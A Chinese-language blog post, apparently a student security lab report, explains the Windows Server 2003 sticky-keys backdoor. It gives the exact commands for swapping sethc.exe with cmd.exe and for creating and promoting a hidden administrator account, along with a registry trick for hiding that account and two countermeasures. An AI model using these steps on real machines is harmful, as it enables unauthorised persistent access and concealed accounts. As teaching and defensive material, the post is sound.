网络安全实验十二 window 2003 Shift后门实验

实验详细介绍了如何利用WindowsServer2003的Shift键粘滞键漏洞创建后门,包括备份和替换sethc.exe,以及通过此漏洞添加用户、提权等操作。同时,文章提出了禁用粘滞键功能和限制sethc.exe访问权限作为防范措施。
摘要由CSDN通过智能技术生成

一、实验目的

1、了解windows系统中的漏洞

2、了解windows系统漏洞的危害

3、了解windows系统如何预防漏洞带来的危害

4、了解利用windows 2003系统粘滞键漏洞建立后门程序并利用该后门

二、实验环境

实验主机:Windows Server 2003

实验目标服务器:

网络环境:实验室局域网

三、实验内容与实验要求

实验步骤一

Shift后门制作 

1、登录win2003实验主机。

2、点击开始 -> 运行,在运行的对话框中输入cmd回车。

3、切换到system32目录下,备份sethc.exe ,依次执行如下命令

cd \

cd c:\windows\system32

move sethc.exe sethc.exe.bak

4、将cmd.exe改成为sethc.exe,执行如下命令:

copy cmd.exe sethc.exe

实验步骤二

感受下Shift后门

1、在本地计算机使用mstsc命令远程到该win2003主机。
2、连续按5次shift键,激活后门程序,并执行添加用户等各种操作,输入net user查看当前账户信息。建立账户hack01密码为123456、hack01提取administrators权限、激活hack01账号。依次执行如下命令:

建立账户和密码

net user hack01 123456 /add

查看hack用户是否被添加:

net user

Hack获取administrators账户权限:

net localgroup administrators hack01 /add

激活hack账户:

net user hack01 /active:yes

3、输入账户hack01和密码123456进入目标主机,成功进入说明实验成功。
4、已经成功登录系统了,说明实验已经成功了。

四、实验过程与分析

五、实验结果总结

通过实验我们学习到本实验是利用在应用“使用粘滞键”后,windows系统在按5次shift后会调用“sethc.exe”应用程序的原理,将cmd.exe复制并更名为“sethc.exe”,然后替换掉原有的sethc.exe文件,这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe,这样我们就可以对目标机进行创建用户,对用户进行相关提权和激活,从而进入目标机。

防范措施:

(1)禁用shift键的粘滞功能;

(2)设置权限,让任何用户都无法访问和修改“sethc.exe”文件。

创建隐藏用户:

创建用户后,按win+r,输入regedit回车,把注册表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList,在里面创建一个dword值,命名为你要隐藏的用户名,数值0。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Meteor.792

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值